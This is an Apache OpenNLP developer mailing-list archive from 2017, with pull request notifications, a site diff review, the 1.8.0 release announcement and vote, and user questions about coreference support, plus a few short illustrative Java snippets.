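In the toy, the failure goes away once something is registered under the key the lookup actually uses. Which key the real library uses for a given resource is the open question in the thread, so treat the extension rule here as a guess.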


[GitHub] opennlp pull request #226: OPENNLP-1088: Reduce fork count for eval tests

2017-06-06 Thread kottmann
Github user kottmann closed the pull request at:

https://github.com/apache/opennlp/pull/226




[GitHub] opennlp pull request #225: OPENNLP-1087: Add convenience methods to load fro...

2017-05-31 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/225

OPENNLP-1087: Add convenience methods to load from Path


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1087

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/225.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #225


commit b777a3f523a64b4ca6858803a7299fe6e290553f
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-31T22:17:57Z

OPENNLP-1087: Add convenience methods to load from Path






[GitHub] opennlp pull request #224: OPENNLP-1085: Add methods to write model to File ...

2017-05-31 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/224

OPENNLP-1085: Add methods to write model to File or Path
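
For readers unfamiliar with this kind of convenience method, here is a minimal sketch of the general pattern, assuming a model that already knows how to write itself to an `OutputStream`. `SketchModel` and its `serialize` overloads are hypothetical names and are not taken from the pull request; the point is only that the `Path` and `File` variants open and close the stream and delegate to the stream-based method.

```java
import java.io.BufferedOutputStream;
import java.io.File;
import java.io.IOException;
import java.io.OutputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;

final class SketchModel {
    private final String payload;

    SketchModel(String payload) {
        this.payload = payload;
    }

    // Core method: the convenience overloads below delegate to this one.
    void serialize(OutputStream out) throws IOException {
        out.write(payload.getBytes(StandardCharsets.UTF_8));
    }

    // Convenience overload: opens, buffers, and closes the stream for the caller.
    void serialize(Path path) throws IOException {
        try (OutputStream out = new BufferedOutputStream(Files.newOutputStream(path))) {
            serialize(out);
        }
    }

    // Convenience overload for callers that still hold a java.io.File.
    void serialize(File file) throws IOException {
        serialize(file.toPath());
    }

    public static void main(String[] args) throws IOException {
        Path tmp = Files.createTempFile("sketch-model", ".bin");
        new SketchModel("abc").serialize(tmp);
        System.out.println(Files.size(tmp));
        Files.delete(tmp);
    }
}
```

Keeping the stream-based method as the single implementation means the overloads cannot drift apart, and the try-with-resources block guarantees the file handle is released even if writing fails.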


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1085

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/224.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #224


commit 93399d8657b884ad48e478fa34584de62e08dab2
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-31T21:31:32Z

OPENNLP-1085: Add methods to write model to File or Path






[GitHub] opennlp pull request #223: OPENNLP-1086: Refactor the Data Indexers

2017-05-30 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/223

OPENNLP-1086: Refactor the Data Indexers

The following has been done:
- Use Java 8 streams where it makes sense
- Deduplicate the index method and have one common one
- Avoid having all predicate Strings twice in memory for cutoff filter
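
As a rough illustration of the first and last points, a stream-based cutoff filter could look like the sketch below. It assumes events are plain lists of predicate strings; `CutoffSketch` and `indexPredicates` are made-up names and this is not the indexer code from the pull request. Each predicate is counted once, and only a predicate-to-index map for the survivors is kept.

```java
import java.util.Arrays;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.function.Function;
import java.util.stream.Collectors;

final class CutoffSketch {
    // Returns predicate -> index for every predicate seen at least `cutoff` times,
    // numbered in order of first appearance.
    static Map<String, Integer> indexPredicates(List<List<String>> events, int cutoff) {
        // Count occurrences of each predicate across all events.
        Map<String, Long> counts = events.stream()
            .flatMap(List::stream)
            .collect(Collectors.groupingBy(
                Function.identity(), LinkedHashMap::new, Collectors.counting()));

        // Keep only predicates that reach the cutoff and assign dense indices.
        Map<String, Integer> index = new LinkedHashMap<>();
        counts.entrySet().stream()
            .filter(e -> e.getValue() >= cutoff)
            .forEach(e -> index.put(e.getKey(), index.size()));
        return index;
    }

    public static void main(String[] args) {
        List<List<String>> events = Arrays.asList(
            Arrays.asList("w=the", "suffix=e"),
            Arrays.asList("w=the", "w=cat"),
            Arrays.asList("suffix=e", "w=the"));
        // "w=cat" occurs only once and is dropped by a cutoff of 2.
        System.out.println(indexPredicates(events, 2));
    }
}
```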


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1086

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/223.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #223


commit a9c65ccfda3a88384da79f5f906b0b98b04d90c0
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-30T09:21:14Z

OPENNLP-1086: Refactor the Data Indexers

The following has been done:
- Use Java 8 streams where it makes sense
- Deduplicate the index method and have one common one
- Avoid having all predicate Strings twice in memory for cutoff filter






[GitHub] opennlp pull request #216: OPENNLP-1076: Add validation of spans to Sentence...

2017-05-24 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/216

OPENNLP-1076: Add validation of spans to SentenceSample


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1076

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/216.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #216


commit d378c0656ff2374a867abe0383aa841275a47d8d
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-24T10:10:37Z

OPENNLP-1076: Add validation of spans to SentenceSample






[GitHub] opennlp pull request #215: OPENNLP-1075 Add streams for sentence and token s...

2017-05-23 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/215

OPENNLP-1075 Add streams for sentence and token samples for conllu


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1075

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/215.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #215


commit 7c9cdba80293ec34e41b8f42bff5d7bbca84333c
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-23T15:28:33Z

OPENNLP-1075 Add streams for sentence and token samples for conllu






Re: opennlp.tools.coref.mention.JWNLDictionary;

2017-05-23 Thread Joern Kottmann
The coref component was removed from OpenNLP quite some time ago because we
no longer had a maintainer for it.
The JWNLDictionary class was part of that removal, but you can still find the
code in the OpenNLP Sandbox:
https://github.com/apache/opennlp-sandbox/blob/master/opennlp-coref/src/main/java/opennlp/tools/coref/mention/JWNLDictionary.java

The code is licensed under the Apache License 2.0, so it should be possible to
include it as is in your project.

Jörn

On Tue, May 23, 2017 at 11:24 AM, Serano Colameo  wrote:

> Hi,
>
> I just discovered that opennlp.tools.coref.mention.JWNLDictionary in
> version opennlp-tools 1.7.2 was somehow removed or moved somewhere else.
>
> I am asking because I need to integrate the WordNet dictionary into my
> system.
>
> Can you please help?
>
> Thanks
> Serano
>
>


[GitHub] opennlp pull request #214: OPENNLP-1074: Reduce visibility of eval methods

2017-05-22 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/214

OPENNLP-1074: Reduce visibility of eval methods


You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1074

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/214.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #214


commit 226612f48bb40eb55ef5814ab9ee995fe9b30f71
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-22T14:05:33Z

OPENNLP-1074: Reduce visibility of eval methods






[GitHub] opennlp-site pull request #14: OPENNLP-1067: Use variables in jbake.properti...

2017-05-19 Thread kottmann
Github user kottmann commented on a diff in the pull request:

https://github.com/apache/opennlp-site/pull/14#discussion_r117455933
  
--- Diff: src/main/jbake/content/maven-dependency.ad ---
@@ -35,59 +34,75 @@ all transient dependencies are resolved automatically.
 
 To use the OpenNLP Tools define the following dependency:
 
-
-
-  org.apache.opennlp
-  opennlp-tools
-  1.7.2
-
-
+[source,xml,indent=0,subs=attributes+]
+
+
+  org.apache.opennlp
+  opennlp-tools
+  {opennlp_version}
+
+
 
 ## OpenNLP UIMA Annotators Dependency
 
 To use the OpenNLP UIMA Annotators define the following dependency:
 
-
-  org.apache.opennlp
-  opennlp-uima
-  1.7.2
-
+[source,xml,indent=0,subs=attributes+]
+
+
+  org.apache.opennlp
+  opennlp-uima
+  {opennlp_version}
+
+
 
 ## OpenNLP Morfologik AddOn Dependency
 
 To use the OpenNLP Morfologik-Addon define the following dependency:
 
-
-  org.apache.opennlp
-  opennlp-morfologik-addon
-  1.7.2
-
+[source,xml,indent=0,subs=attributes+]
+
+
+  org.apache.opennlp
+  opennlp-morfologik-addon
+  {opennlp_version}
+
+
 
 ## OpenNLP Brat Annotator Dependency
 
 To use the OpenNLP UIMA Annotators define the following dependency:
 
-
-  org.apache.opennlp
-  opennlp-brat-annotator
-  1.7.2
-
+[source,xml,indent=0,subs=attributes+]
+
+
+  org.apache.opennlp
+  opennlp-brat-annotator
+  {opennlp_version}
+
+
 
 ## OpenNLP Tools SNAPSHOT Dependency
 
 To use the current trunk version define the following dependency:
 
-
-  org.apache.opennlp
-  opennlp-tools
-  1.7.3-SNAPSHOT
-
+[source,xml,indent=0,subs=attributes+]
+
+
+  org.apache.opennlp
+  opennlp-tools
+  {opennlp_next_version}
+
+
 
 The SNAPSHOT dependency requires the following repository:
 
-
-  
-apache opennlp snapshot
-
https://repository.apache.org/content/repositories/snapshots/
-  
-
\ No newline at end of file
+[source,xml,indent=0,subs=attributes+]
+
+
+  
+apache opennlp snapshot
+
https://repository.apache.org/content/repositories/snapshots/
+  
+
+
--- End diff --

Add a newline here; files are supposed to end with a newline.




[GitHub] opennlp-site pull request #14: OPENNLP-1067: Use variables in jbake.properti...

2017-05-19 Thread kottmann
Github user kottmann commented on a diff in the pull request:

https://github.com/apache/opennlp-site/pull/14#discussion_r117455817
  
--- Diff: src/main/jbake/content/docs/index.ad ---
@@ -25,12 +25,12 @@
 There exists a manual and Javadoc API documentation for Apache OpenNLP. 
The manual
 explains how the various OpenNLP components can be used and trained.
 
-### Apache OpenNLP 1.8.0 documentation
+### Apache OpenNLP {opennlp_version} documentation
 
-* link:/docs/1.8.0/manual/opennlp.html[Apache OpenNLP Manual]
-* link:/docs/1.8.0/apidocs/opennlp-tools/index.html[Apache OpenNLP Tools 
Javadoc]
-* link:/docs/1.8.0/apidocs/opennlp-uima/index.html[Apache OpenNLP UIMA 
Javadoc]
-* link:/docs/1.8.0/apidocs/opennlp-brat-annotator/index.html[Apache 
OpenNLP BRAT Annotator Javadoc]
-* link:/docs/1.8.0/apidocs/opennlp-morfologik-addon/index.html[Apache 
OpenNLP Morfologik Addon Javadoc]
+* link:/docs/1.7.2/manual/opennlp.html[Apache OpenNLP Manual]
--- End diff --

Should this be 1.8.0?




[ANNOUNCE] Apache OpenNLP 1.8.0 Release

2017-05-19 Thread Joern Kottmann
The Apache OpenNLP team is pleased to announce the release of version 1.8.0
of Apache OpenNLP.

The Apache OpenNLP library is a machine learning based toolkit for the
processing of natural language text.

It supports the most common NLP tasks, such as tokenization, sentence
segmentation, part-of-speech tagging, named entity extraction, chunking,
parsing, and coreference resolution.

The OpenNLP 1.8.0 binary and source distributions are available for
download from our download page:
https://opennlp.apache.org/download.html

The OpenNLP library is distributed by Maven Central as well. See the Maven
Dependency page for more details:
https://opennlp.apache.org/maven-dependency.html

Java 1.8 is required to run OpenNLP, and Maven 3.3.9 is required to build it.

Building from the Source Distribution

To build everything execute the following command in the root folder:
mvn clean install

The results of the build will be placed in:
opennlp-distr/target/apache-opennlp-1.8.0-bin.tar.gz (or .zip)

What's new in Apache OpenNLP 1.8.0

This release introduces many new features, improvements and bug fixes. The
API has been improved for better consistency and many deprecated methods were
removed. Java 1.8 is required.

Additionally the release contains the following noteworthy changes:

- POS Tagger context generator now supports feature generation XML
- Add a Name Finder feature generator that adds POS Tag features
- Add CONLL-U format support
- Improve default Name Finder settings
- TokenNameFinderEvaluator CLI now supports nameTypes argument
- Stupid backoff is now the default in NGramLanguageModel
- Language codes now are ISO 639-3 compliant
- Add many unit tests
- Distribution package now includes example parameters file
- Now prefix and suffix feature generators are configurable
- Remove API in Document Categorizer for user specified tokenizer
- Learnable lemmatizer now returns all possible lemmas for a given word and
pos tag
- Lemmatizer API backward compatibility break: no need to encode/decode
lemmas anymore, now LemmatizerME lemmatize method returns the actual lemma
- Add stemmer, detokenizer and sentence detection abbreviations for Irish
- Chunker SequenceValidator signature changed to allow access to both token
and POS tag
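
As a rough illustration of the "stupid backoff" item in the list above: the
scheme scores an n-gram by its relative frequency when it has been seen, and
otherwise falls back to the shorter n-gram multiplied by a fixed factor. The
sketch below is a toy version only. The class name, the 0.4 factor and the
counting scheme are assumptions made for this example and do not reflect how
NGramLanguageModel is actually implemented.

```java
import java.util.Arrays;
import java.util.HashMap;
import java.util.List;
import java.util.Map;

// Toy illustration of stupid backoff scoring.
// Hypothetical class, not OpenNLP's NGramLanguageModel.
class StupidBackoffSketch {

  // Fixed backoff factor; 0.4 is a commonly cited value (assumption for this sketch).
  private static final double BACKOFF = 0.4;

  private final Map<List<String>, Integer> counts = new HashMap<>();
  private int totalTokens = 0;

  // Counts every n-gram of length 1..maxOrder in one tokenized sentence.
  void add(String[] tokens, int maxOrder) {
    totalTokens += tokens.length;
    for (int start = 0; start < tokens.length; start++) {
      for (int n = 1; n <= maxOrder && start + n <= tokens.length; n++) {
        List<String> gram = Arrays.asList(Arrays.copyOfRange(tokens, start, start + n));
        counts.merge(gram, 1, Integer::sum);
      }
    }
  }

  // Scores the last token of the n-gram given the tokens before it.
  double score(List<String> ngram) {
    if (ngram.size() == 1) {
      // Base case: unigram relative frequency.
      return totalTokens == 0 ? 0.0 : counts.getOrDefault(ngram, 0) / (double) totalTokens;
    }
    List<String> context = ngram.subList(0, ngram.size() - 1);
    int full = counts.getOrDefault(ngram, 0);
    int ctx = counts.getOrDefault(context, 0);
    if (full > 0 && ctx > 0) {
      // Seen n-gram: plain relative frequency, no smoothing.
      return full / (double) ctx;
    }
    // Unseen n-gram: drop the first token and discount by the fixed factor.
    return BACKOFF * score(ngram.subList(1, ngram.size()));
  }
}
```

The scores are not normalized probabilities, which is the trade-off the scheme
makes for simplicity.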

A detailed list of the issues related to this release can be found in the
release notes.

Thanks again to all contributors and committers for their help.


[GitHub] opennlp pull request #196: [1.8.1] OPENNLP-1054: Remove deprecated Heap and ...

2017-05-19 Thread kottmann
Github user kottmann closed the pull request at:

https://github.com/apache/opennlp/pull/196




[GitHub] opennlp pull request #212: OPENNLP-1068: Use current version to generate cha...

2017-05-19 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/212

OPENNLP-1068: Use current version to generate changes list

You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1068

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/212.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #212


commit c9d60b9c070ac9ea7ef77e7282053b7ac392b37c
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-19T09:14:02Z

OPENNLP-1068: Use current version to generate changes list






[GitHub] opennlp-site pull request #12: Update site for 1.8.0 release

2017-05-18 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp-site/pull/12

Update site for 1.8.0 release



You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp-site 180_release

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp-site/pull/12.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #12


commit d219b3c4ec9e03cda0f4b968783525f321fab03f
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-18T22:03:58Z

Update site for 1.8.0 release






Re: [VOTE] Apache OpenNLP 1.8.0 Release Candidate 3

2017-05-18 Thread Joern Kottmann
The vote passes, only +1 votes were received:
+1 Bruno
+1 Tommaso
+1 William
+1 Jörn
+1 Jeff
+1 Daniel
+1 Richard
+1 Joey
+1 Suneel
+1 Rodrigo

Thanks for voting!

Jörn

On Wed, 2017-05-17 at 23:48 +0200, Joern Kottmann wrote:
> The Apache OpenNLP PMC would like to call for a Vote on Apache
> OpenNLP
> 1.8.0 Release Candidate 3. 
> 
> The RC 3 distributables can be downloaded from here:
> https://repository.apache.org/content/repositories/orgapacheopennlp-1013/org/apache/opennlp/opennlp-distr/1.8.0/
> 
> The release was made from the Apache OpenNLP 1.8.0 tag at
> https://github.com/apache/opennlp/tree/opennlp-1.8.0
>  
> To use it in a maven build set the version for opennlp-tools or
> opennlp-uima to 1.8.0 and add the following URL to your settings.xml
> file:
> https://repository.apache.org/content/repositories/orgapacheopennlp-1013
>  
> The release was made using the OpenNLP release process, documented on
> the Wiki here:
> https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
>  
> The release contains quite some changes, please refer to the
> contained
> issue list for details.
>  
> Please vote on releasing these packages as Apache OpenNLP 1.8.0. The
> vote is open for at least the next 72 hours.
>  
> Only votes from OpenNLP PMC are binding, but folks are welcome to
> check
> the release candidate and voice their approval or disapproval. The
> vote
> passes if at least three binding +1 votes are cast.
>  
> [ ] +1 Release the packages as Apache OpenNLP 1.8.0
> [ ] -1 Do not release the packages because...
>  
>  
> Thanks!
> 
> Jörn
> 
> P.S. Here is my +1.


Re: [VOTE] Apache OpenNLP 1.8.0 Release Candidate 3

2017-05-18 Thread Joern Kottmann
@Richard, it would be nice if you could vote as well so we know that what
we have now in RC 3 works for you.

Jörn

On Thu, May 18, 2017 at 4:56 PM, William Colen <william.co...@gmail.com>
wrote:

> +1 (binding)
>
> Successfully executed complete evaluation tests in source deliverable.
> Tried it with DKPro and after updating the Lemmatizer and Chunker usage
> there were two test failures that we could trace back to issues fixed in
> OPENNLP-125 and OPENNLP-989 that would affect evaluation results.
>
>
>
> 2017-05-18 10:08 GMT-03:00 Tommaso Teofili <tommaso.teof...@gmail.com>:
>
> > +1 (binding)
> >
> > Regards,
> > Tommaso
> >
> > p.s.:
> >
> > +1 also to Bruno's side comments
> >
> > Il giorno gio 18 mag 2017 alle ore 12:43 Bruno P. Kinoshita
> > <brunodepau...@yahoo.com.br.invalid> ha scritto:
> >
> > >
> > > [ X ] +1 Release the packages as Apache OpenNLP 1.8.0
> > >
> > > Not binding
> > >
> > > Side note: would be nice later to start fixing some issues found via
> > > FindBugs. Running `mvn clean findbugs:findbugs findbugs:gui` shows several
> > > errors, some seem important, like using equals() for array objects (which
> > > will always be false).
> > >
> > > See
> > >
> > >
> > > https://github.com/apache/opennlp/blob/73c8e5b9d8e055fefb53f7f3c2487d05c9788c6a/opennlp-tools/src/main/java/opennlp/tools/util/TokenTag.java#L85
> > >
> > > And
> > >
> > >
> > >
> > > https://github.com/apache/opennlp/blob/73c8e5b9d8e055fefb53f7f3c2487d05c9788c6a/opennlp-tools/src/main/java/opennlp/tools/util/featuregen/POSTaggerNameFeatureGenerator.java#L59
> > > Plus other NullPointerException's that can be prevented, and other minor
> > > issues. Not blockers for the release though, IMO.
> > >
> > > Cheers
> > > Bruno
> > >
> > >
> > > 
> > > From: Joern Kottmann <kottm...@gmail.com>
> > > To: dev@opennlp.apache.org
> > > Sent: Thursday, 18 May 2017 9:49 AM
> > > Subject: [VOTE] Apache OpenNLP 1.8.0 Release Candidate 3
> > >
> > >
> > >
> > > The Apache OpenNLP PMC would like to call for a Vote on Apache OpenNLP
> > >
> > > 1.8.0 Release Candidate 3.
> > >
> > >
> > > The RC 3 distributables can be downloaded from here:
> > >
> > > https://repository.apache.org/content/repositories/orgapacheopennlp-1013/org/apache/opennlp/opennlp-distr/1.8.0/
> > >
> > >
> > > The release was made from the Apache OpenNLP 1.8.0 tag at
> > >
> > > https://github.com/apache/opennlp/tree/opennlp-1.8.0
> > >
> > >
> > >
> > > To use it in a maven build set the version for opennlp-tools or
> > >
> > > opennlp-uima to 1.8.0 and add the following URL to your settings.xml
> > >
> > > file:
> > >
> > > https://repository.apache.org/content/repositories/orgapacheopennlp-1013
> > >
> > >
> > >
> > > The release was made using the OpenNLP release process, documented on
> > >
> > > the Wiki here:
> > >
> > > https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
> > >
> > >
> > >
> > > The release contains quite some changes, please refer to the contained
> > >
> > > issue list for details.
> > >
> > >
> > >
> > > Please vote on releasing these packages as Apache OpenNLP 1.8.0. The
> > >
> > > vote is open for at least the next 72 hours.
> > >
> > >
> > >
> > > Only votes from OpenNLP PMC are binding, but folks are welcome to check
> > >
> > > the release candidate and voice their approval or disapproval. The vote
> > >
> > > passes if at least three binding +1 votes are cast.
> > >
> > >
> > >
> > > [ ] +1 Release the packages as Apache OpenNLP 1.8.0
> > >
> > > [ ] -1 Do not release the packages because...
> > >
> > >
> > >
> > >
> > >
> > > Thanks!
> > >
> > >
> > > Jörn
> > >
> > >
> > > P.S. Here is my +1.
> > >
> >
>
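
For readers who have not run into the FindBugs warning mentioned in the side
note above: calling equals() on an array compares references, so two distinct
arrays with the same elements are not equal that way. A minimal sketch of the
difference follows. The class and method names are made up for illustration
and are not taken from TokenTag or POSTaggerNameFeatureGenerator.

```java
import java.util.Arrays;

// Hypothetical demo class, not part of OpenNLP.
class ArrayEqualsDemo {

  // Compares two arrays element by element instead of by reference.
  static boolean sameContents(String[] a, String[] b) {
    return Arrays.equals(a, b);
  }

  public static void main(String[] args) {
    String[] first = {"NN", "VB"};
    String[] second = {"NN", "VB"};

    // Object.equals on arrays is a reference comparison.
    System.out.println(first.equals(second));        // false
    // Arrays.equals compares the contents.
    System.out.println(sameContents(first, second)); // true
  }
}
```

For nested arrays, Arrays.deepEquals would be the content-based counterpart.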


[GitHub] opennlp pull request #211: Add support to train on leipzig

2017-05-18 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/211

Add support to train on leipzig

You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp add_leipzig

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/211.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #211








Re: CoReference

2017-05-18 Thread Joern Kottmann
That part is not maintained currently. If you would like to work on it, you
are more than welcome to get this back into opennlp-tools.

Jörn

On Thu, May 18, 2017 at 4:37 PM, Damiano Porta <damianopo...@gmail.com>
wrote:

> Do you also have an example? :)
>
> Il 18 mag 2017 16:35, "Damiano Porta" <damianopo...@gmail.com> ha scritto:
>
> > Oh my wrong. Pardon.
> > Do we have accuracy statistics?
> >
> > Il 18 mag 2017 14:59, "Joern Kottmann" <kottm...@gmail.com> ha scritto:
> >
> >> This is for linking entities in one document, e.g. first name mention to a
> >> full name mention, or to he, she, it.
> >>
> >> Jörn
> >>
> >> On Thu, May 18, 2017 at 1:27 PM, Damiano Porta <damianopo...@gmail.com>
> >> wrote:
> >>
> >> > Hi, thanks but I need to link entities to each others . I do not need
> to
> >> > link entities to external resources.
> >> >
> >> > Damiano
> >> >
> >> > Il 18 mag 2017 13:12, "Bruno P. Kinoshita"
> >> > <brunodepau...@yahoo.com.br.invalid> ha scritto:
> >> >
> >> > > A few days ago I went to look at an old issue to see if I could perhaps
> >> > > write some docs for it, but I think the coref module is now in the
> >> > > sandbox.
> >> > >
> >> > >
> >> > > Here's the issue in question
> >> > > https://issues.apache.org/jira/browse/OPENNLP-48 and here's where I
> >> > > believe the code is now located
> >> > > https://svn.apache.org/repos/asf/opennlp/sandbox/opennlp-coref/
> >> > >
> >> > > Not sure if there was any other work not mentioned in that issue.
> >> > >
> >> > > Hope that helps
> >> > > Bruno
> >> > > 
> >> > > From: Damiano Porta <damianopo...@gmail.com>
> >> > > To: dev@opennlp.apache.org
> >> > > Sent: Thursday, 18 May 2017 10:54 PM
> >> > > Subject: CoReference
> >> > >
> >> > >
> >> > >
> >> > > Hello everybody,
> >> > >
> >> > > i need a coreference solution to link my entities (DATE, PERSON,
> ORG).
> >> > Can
> >> > >
> >> > > someone show me the way to start working on that?
> >> > >
> >> > >
> >> > > Thank you so much.
> >> > >
> >> > > Damiano
> >> > >
> >> >
> >>
> >
>


Re: CoReference

2017-05-18 Thread Joern Kottmann
This is for linking entities in one document, e.g. first name mention to a
full name mention, or to he, she, it.

Jörn

On Thu, May 18, 2017 at 1:27 PM, Damiano Porta 
wrote:

> Hi, thanks but I need to link entities to each others . I do not need to
> link entities to external resources.
>
> Damiano
>
> Il 18 mag 2017 13:12, "Bruno P. Kinoshita"
>  ha scritto:
>
> > A few days ago I went to look at an old issue to see if I could perhaps
> > write some docs for it, but I think the coref module is now in the sandbox.
> >
> >
> > Here's the issue in question
> > https://issues.apache.org/jira/browse/OPENNLP-48 and here's where I
> > believe the code is now located
> > https://svn.apache.org/repos/asf/opennlp/sandbox/opennlp-coref/
> >
> > Not sure if there was any other work not mentioned in that issue.
> >
> > Hope that helps
> > Bruno
> > 
> > From: Damiano Porta 
> > To: dev@opennlp.apache.org
> > Sent: Thursday, 18 May 2017 10:54 PM
> > Subject: CoReference
> >
> >
> >
> > Hello everybody,
> >
> > I need a coreference solution to link my entities (DATE, PERSON, ORG). Can
> > someone show me the way to start working on that?
> >
> >
> > Thank you so much.
> >
> > Damiano
> >
>


[VOTE] Apache OpenNLP 1.8.0 Release Candidate 3

2017-05-17 Thread Joern Kottmann
The Apache OpenNLP PMC would like to call for a Vote on Apache OpenNLP
1.8.0 Release Candidate 3. 

The RC 3 distributables can be downloaded from here:
https://repository.apache.org/content/repositories/orgapacheopennlp-1013/org/apache/opennlp/opennlp-distr/1.8.0/

The release was made from the Apache OpenNLP 1.8.0 tag at
https://github.com/apache/opennlp/tree/opennlp-1.8.0
 
To use it in a maven build set the version for opennlp-tools or
opennlp-uima to 1.8.0 and add the following URL to your settings.xml
file:
https://repository.apache.org/content/repositories/orgapacheopennlp-1013
 
The release was made using the OpenNLP release process, documented on
the Wiki here:
https://cwiki.apache.org/confluence/display/OPENNLP/Release+Process
 
The release contains quite a few changes; please refer to the contained
issue list for details.
 
Please vote on releasing these packages as Apache OpenNLP 1.8.0. The
vote is open for at least the next 72 hours.
 
Only votes from OpenNLP PMC are binding, but folks are welcome to check
the release candidate and voice their approval or disapproval. The vote
passes if at least three binding +1 votes are cast.
 
[ ] +1 Release the packages as Apache OpenNLP 1.8.0
[ ] -1 Do not release the packages because...
 
 
Thanks!

Jörn

P.S. Here is my +1.


[GitHub] opennlp pull request #205: OPENNLP-1064: Disable evalDutchMaxentQn test

2017-05-17 Thread kottmann
Github user kottmann closed the pull request at:

https://github.com/apache/opennlp/pull/205




[GitHub] opennlp pull request #206: [WIP] OPENNLP-1065: Use ISO-639-3 in test code

2017-05-17 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/206

[WIP] OPENNLP-1065: Use ISO-639-3 in test code

You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1065

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/206.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #206


commit 8f394be0d068ef2385d08af1554f897c0c761350
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-17T09:24:23Z

OPENNLP-1065: Use ISO-639-3 in test code
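
As background for the change above: ISO 639-3 uses three-letter language
codes ("eng", "deu", "nld") where older code often used two-letter ISO 639-1
codes ("en", "de", "nl"). The sketch below shows one way to look up the
three-letter form with the JDK alone. The helper class is hypothetical and is
not an OpenNLP API; the JDK documents the returned values as ISO 639-2/T
codes, which match the ISO 639-3 codes for the languages shown here.

```java
import java.util.Locale;

// Hypothetical helper, not part of OpenNLP.
class Iso639Sketch {

  // Maps a two-letter language code to the three-letter code known to the JDK.
  // Throws MissingResourceException if the JDK has no three-letter code for it.
  static String toThreeLetter(String twoLetter) {
    return Locale.forLanguageTag(twoLetter).getISO3Language();
  }

  public static void main(String[] args) {
    System.out.println(toThreeLetter("en")); // eng
    System.out.println(toThreeLetter("nl")); // nld
  }
}
```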






[GitHub] opennlp pull request #205: OPENNLP-1064: Disable evalDutchMaxentQn test

2017-05-17 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/205

OPENNLP-1064: Disable evalDutchMaxentQn test

You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1064

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/205.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #205


commit 1a70b54f7f0432035f917b52989ee0318b1544af
Author: Jörn Kottmann <jo...@apache.org>
Date:   2017-05-17T08:11:57Z

OPENNLP-1064: Disable evalDutchMaxentQn test






[GitHub] opennlp pull request #201: Opennlp 1060

2017-05-15 Thread kottmann
GitHub user kottmann opened a pull request:

https://github.com/apache/opennlp/pull/201

Opennlp 1060

You can merge this pull request into a Git repository by running:

$ git pull https://github.com/kottmann/opennlp opennlp-1060

Alternatively you can review and apply these changes as the patch at:

https://github.com/apache/opennlp/pull/201.patch

To close this pull request, make a commit to your master/trunk branch
with (at least) the following in the commit message:

This closes #201


commit 54432f8bc660d0ce64acc6569609644ae9bb4848
Author: beylerian <anthony.beyler...@gmail.com>
